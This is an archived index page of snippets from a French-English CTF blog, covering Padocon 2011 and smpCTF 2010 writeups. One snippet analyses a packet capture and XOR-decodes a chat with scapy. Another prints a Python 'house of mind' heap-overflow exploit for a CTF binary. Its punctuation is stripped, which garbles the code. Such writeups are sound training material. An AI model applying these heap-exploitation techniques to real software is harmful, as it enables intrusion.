archive-fr.com » FR » A » AEROXTEAM.FR

Total: 49

Choose link from "Titles, links and description words view":

Or switch to "Titles and links view".
  • Gu1's Website - Posts taggés « format string »
    padocon writeup Hello This is another writeup for the Padocon 2011 CTF This time i m gonna talk about a wargame style binary exploitation level karma 100 This one was not that difficult to exploit in fact it took us only a couple of hours to obtain reliable code execution but we were unable to find the flag until much later We were given ssh credentials and once logged in

    Original URL path: http://gu1.aeroxteam.fr/tags/format%20string/ (2015-12-30)
    Open archived version from archive


  • Gu1's Website - Posts taggés « writeup »
    les 1800 points mais le classement complet n a pas encore été publié J ai travaillé sur quelques épreuves certaines étaient sympa comme la Forensic Quest que j ai faite avec teach bik3te et d autres Voici donc un 3 Commentaires Lire la suite smpCTF 2010 challenge 9 writeup Par Gu1 le 22 07 2010 à 19 25 tags ctf english heap overflow smpctf writeup Note ce post est disponible

    Original URL path: http://gu1.aeroxteam.fr/tags/writeup/page/2/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Padocon 2011, writeup Forensic Quest
    192 168 111 130 onbase dds 192 168 111 132 armtechdaemon A 0050 15 55 56 098797 Ether IP TCP 192 168 111 130 onbase dds 192 168 111 132 armtechdaemon PA Raw 0000 5B 21 4D 53 47 49 4E 46 4F 5F 5D 00 06 00 00 00 MSGINFO 0010 0A 00 00 00 5B 2F 21 45 4E 44 49 4E 46 4F 5D 00 ENDINFO 0051 15 55 56 231048 Ether IP TCP 192 168 111 132 armtechdaemon 192 168 111 130 onbase dds A Padding 0052 15 55 56 231122 Ether IP TCP 192 168 111 130 onbase dds 192 168 111 132 armtechdaemon PA Raw 0000 DB FA FE E4 E1 E6 C6 E1 EB ED A8 DF E7 FA E3 A9 0053 15 55 56 450020 Ether IP TCP 192 168 111 132 armtechdaemon 192 168 111 130 onbase dds A Padding Yay on vois une chaine en base64 tout en haut On la décode str interesting 5 3 decode base64 Hint xor ENCRYPT d ENDINFO hexdump str interesting 5 3 decode base64 0000 48 69 6E 74 3A 20 78 6F 72 2C 20 5B 21 45 4E 43 Hint xor ENC 0010 52 59 50 54 5F 5D 25 64 3F 3F 5B 2F 21 45 4E 44 RYPT d END 0020 49 4E 46 4F 5D INFO En regardant le reste on voit que c est en partie chiffré ou obfusqué d une façon ou d une autre probablement xoré vu l indice dans la chaine base64 Il y a néanmoins des parties en clair les balises MSGINFO et ENDINFO qui contiennent probablement des méta données sur les données qui sont transmises après chaque ENDINFO Là c est ça devient un peu confus On pourrait croire que la clé XOR est 0x3f en ascii à cause du d mais en fait la chaine base64 est censé nous indiquer que la clé XOR se trouve entre les balise ENCRYPT et ENDINFO qui sont tout au début du flux 0000 5 B 21 45 4 E 43 52 59 50 54 5 F 5 D 00 00 00 00 00 ENCRYPT 0010 88 00 00 00 5 B 2 F 21 45 4 E 44 49 4 E 46 4 F 5 D 00 ENDINFO Et qu est ce qu on trouve entre ces deux balises des octets null et 0x88 qui est donc la clé XOR Grâce à un petit script scapy on peut donc déchiffrer le reste facilement Voici à quoi ça ressemble d abord on met toute les données dans une chaine rawdata for i in interesting filter lambda x x 2 dport 2185 or x 2 sport 2185 if i haslayer Raw rawdata i getlayer Raw load ensuite il faut extraire chaque message En rédigant le writeup je me suis rendu compte que les paquets sont sous la forme MSGINFO longueur du pseudo longueur du reste du message ENDINFO les deux nombres sont des entiers de 32 bits little endian Sachant que le but ici n est pas de programmer un décodeur exaustif du truc mais juste lire le texte décodé j ai utilisé une bête regex def xor s k return join chr ord s i k for i in range len s for i in re findall ENDINFO rawdata xor i lstrip x00 0x88 xdb xcf xe4 xfd xec xcc xe7 xef xed xcf xb1 xf1 xc4 xcb xca xea xc1 xdd xde xc7 xd9 xb9 xc2 xd2 xdd xce xda xee xd0 xdb xde xe3 xd8 xf2 xb1 xea xc4 xf1 xce xce xdc xe3 xda xc2 xdc xe3 xd2 xd8 xd0 xd9 xb5 xb5 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 x88 SrvlinHi q kinoHello Srvlin kinowhat s up SrvlinHey Could you try and resend File plz kinook Srvlinthx kino kinoFile is Compressed kinoPassWord is pwishere On a donc intercepté la conversation entre deux individus kino et Srvlin qui parlent de s échanger un fichier compressé dont le mot de passe est pwishere mais aucune trace du fichier dans la connexion tcp qu on analyse Cherchons en donc une autre interesting nsummary prn lambda x x sprintf TCP IP src r TCP sport IP dst r TCP dport TCP flags lfilter lambda x x 2 flags 2 or x 2 flags 18 0000 TCP 192 168 111 130 2185 192 168 111 132 9292 S 0001 TCP 192 168 111 132 9292 192 168 111 130 2185 SA 0027 TCP 192 168 111 132 1060 192 168 111 130 9000 S 0028 TCP 192 168 111 130 9000 192 168 111 132 1060 SA Il y a en effet deux connections La seconde provient de l hôte distant 192 168 111 132 du port 1060 interesting hexraw lfilter lambda x x 2 dport 1060 or x 2 sport 1060 0027 15 53 45 523668 Ether IP TCP 192 168 111 132 polestar 192 168 111 130 cslistener S 0028 15 53 45 523817 Ether IP TCP 192 168 111 130 cslistener 192 168 111 132 polestar SA 0029 15 53 45 524144 Ether IP TCP 192 168 111 132 polestar 192 168 111 130 cslistener A Padding 0030 15 53 45 524292 Ether IP TCP 192 168 111 132 polestar 192 168 111 130 cslistener PA Raw 0000 5B 21 46 49 4C 45 53 45 4E 44 5D 00 BA 06 00 00 FILESEND 0010 08 00 00 00 5B 2F 21 45 4E 44 49 4E 46 4F 5D 00 ENDINFO 0031 15 53 45 524708

    Original URL path: http://gu1.aeroxteam.fr/2011/01/18/padocon-2011-writeup-forensic-quest/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « forensic »
    Salut Le premier gros CTF de l année a eu lieu le week end dernier celui de la Padocon 2011 un CTF Coréen auquel j avais déjà participé l année dernière Le CTF lui même était plutôt bien foutu bonne orga Les épreuves étaient intéressantes pas de guessing trop hardcore J ai participé avec la team w0ea fhpr abhf on a du avoir vers les 1800 points mais le classement

    Original URL path: http://gu1.aeroxteam.fr/tags/forensic/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « scapy »
    Salut Le premier gros CTF de l année a eu lieu le week end dernier celui de la Padocon 2011 un CTF Coréen auquel j avais déjà participé l année dernière Le CTF lui même était plutôt bien foutu bonne orga Les épreuves étaient intéressantes pas de guessing trop hardcore J ai participé avec la team w0ea fhpr abhf on a du avoir vers les 1800 points mais le classement

    Original URL path: http://gu1.aeroxteam.fr/tags/scapy/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - smpCTF 2010 challenge #9 writeup
    PROT READ PROT WRITE PROT EXEC free ptr Bypassing antidbg technique was trickier than we first thought The binary was compiled as a position independant executable and GDB refused to insert breakpoint probably because it was an old version support for PIE was introduced in GDB 7 1 Anyway we ended up patching the binary using vim and xxd We replaced the conditional jump by a int 3 That way we could debug the binary We had an old house of mind exploit in python laying around and we found it more convenient to use it rather than to try adapting the one in C from the article We simply had to modify the values in our exploit ASLR was deactivated which made our task easier but we still needed to find a function pointer to overwrite somewhere in memory We the tried the usual dtor fini but none of that worked Overwriting main saved eip was our last solution Here is the exploit from sys import stdout from struct import pack from sys import argv DUMMY VALUE A CHUNK SIZE 1024 CHUNK DATA DUMMY VALUE CHUNK SIZE FAKE MSTATE pack I 0x00000000 FAKE MSTATE pack I 0x00000000 FAKE MSTATE pack I 0x00000000 10 FAKE MSTATE pack I 0xb81003ac FAKE MSTATE pack I 0xb81003ac FAKE MSTATE pack I 0xbffff000 4 int argv 1 CHUNK DATA MSTATE DUMMY VALUE 16 FAKE MSTATE CHUNK DATA len FAKE MSTATE 16 CHUNK HEADER pack I 0x00000000 pack I 0x00000409 CHUNK SMALLEST HEADER pack I 0x00000000 pack I 0x00000009 ARENA HEADER pack I 0xb8001008 16 SHELLCODE xcc MEM2 HEADER pack I 0xeb0e0000 MEM2 HEADER pack I 0x000000cd stdout write CHUNK DATA MSTATE stdout write CHUNK HEADER CHUNK DATA 1011 stdout write CHUNK HEADER DUMMY VALUE 88 ARENA HEADER DUMMY VALUE 932 stdout write MEM2 HEADER

    Original URL path: http://gu1.aeroxteam.fr/2010/07/22/smpctf-2010-challenge-9-writeup/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « heap overflow »
    smpctf writeup Note ce post est disponible en français sur le microblog nibbles This challenge was a heap overflow on linux The glibc version was 2 7 We were not given the source code but thanks to hex rays we had a good idea of what the code looked like The vulnerable program printed some informations to make exploitation easier good heap allignment found on malloc somenumber We searched this

    Original URL path: http://gu1.aeroxteam.fr/tags/heap%20overflow/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « smpctf »
    smpctf writeup Note ce post est disponible en français sur le microblog nibbles This challenge was a heap overflow on linux The glibc version was 2 7 We were not given the source code but thanks to hex rays we had a good idea of what the code looked like The vulnerable program printed some informations to make exploitation easier good heap allignment found on malloc somenumber We searched this

    Original URL path: http://gu1.aeroxteam.fr/tags/smpctf/ (2015-12-30)
    Open archived version from archive